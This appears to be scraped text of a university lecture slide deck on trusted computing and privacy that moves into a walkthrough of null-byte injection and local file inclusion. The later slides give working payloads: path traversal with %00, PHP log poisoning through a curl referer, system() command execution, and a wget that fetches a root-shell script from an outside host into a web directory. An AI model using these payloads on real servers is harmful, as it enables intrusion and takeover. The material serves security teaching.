View
216
Download
0
Tags:
Embed Size (px)
Citation preview
UNR – CSE, Jeff Naruchitparames 3
Computer architecture
Security... privacy
Digital & physical threats
UNR – CSE, Jeff Naruchitparames 4
1. Identification – cryptographic
2. Attestation – digital signatures
3. Normal operating environment – from the computer's environment
(remotely, to
o!)
UNR – CSE, Jeff Naruchitparames 7
Trusted platform module (TPM)
Trusted computing group (TCG)
Root of trust
Dictate accessibility (permissions) a user has
UNR – CSE, Jeff Naruchitparames 11
Problem: Storage
Solution: Encryption, duh!
Problem: Processing/computation of information
Solution: ???
UNR – CSE, Jeff Naruchitparames 13
Blind processing
Ensuring security and in particular, privacy of information from third parties (sys admins, users, hackers, etc)
UNR – CSE, Jeff Naruchitparames 14
Why so important?
ISPs
Power grid owners
Google, Amazon, other web 2.0 companies, etc
Political, economic, competition, etc
UNR – CSE, Jeff Naruchitparames 15
Technical details for another day...
Null-byte poisoning attacks (null-byte injection)
UNR – CSE, Jeff Naruchitparames 16
Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data
Bypass input sanity checking filters
UNR – CSE, Jeff Naruchitparames 18
NULL
= string termination or delimiter
= stop processing a string
= bytes following delimiter will be ignored
UNR – CSE, Jeff Naruchitparames 19
If a string loses its null character, the length of the string = unknown...
… until memory pointer finds the next null byte.
UNR – CSE, Jeff Naruchitparames 20
http://foo.org/index.php[?lang=bar]
/web/htdocs/foo/
Template file includes, yay!
http://foo.org/index.php?lang=../../../etc/password%00
UNR – CSE, Jeff Naruchitparames 21
http://foo.org/index.php?lang=../../../proc/self/fd/2%00
Inject shellcode via symbolic links from /proc/self/<whatever>.
This example assumes Apache error logs are located in /proc/self/fd/2
Now what?
UNR – CSE, Jeff Naruchitparames 22
Note: Error logs are typically written without filtering referer variables (from browsers)
curl “http://foo.org/” -H “Host:” --referer “<?php eval($_GET[cmd]); ?>”
[Mon Feb 08 09:27:45 2010] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>
UNR – CSE, Jeff Naruchitparames 23
http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('pwd')
Write issues?! (permissions)
UNR – CSE, Jeff Naruchitparames 24
http://foo.org/index.php?&lang=../../../proc/self/fd/2%00&cmd=system('find -Type d -perm 0777')
Assume we find a writable directory at: /home/user/public_html/php_files_for_school/
UNR – CSE, Jeff Naruchitparames 25
Injection time!
http://foo.org/index.php?lang=../../../proc/self/fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/homework3.php http://haxor.website/files/amazing_shellcode_to_obtain_root_access/get_root_shell.php');
Privilege escalation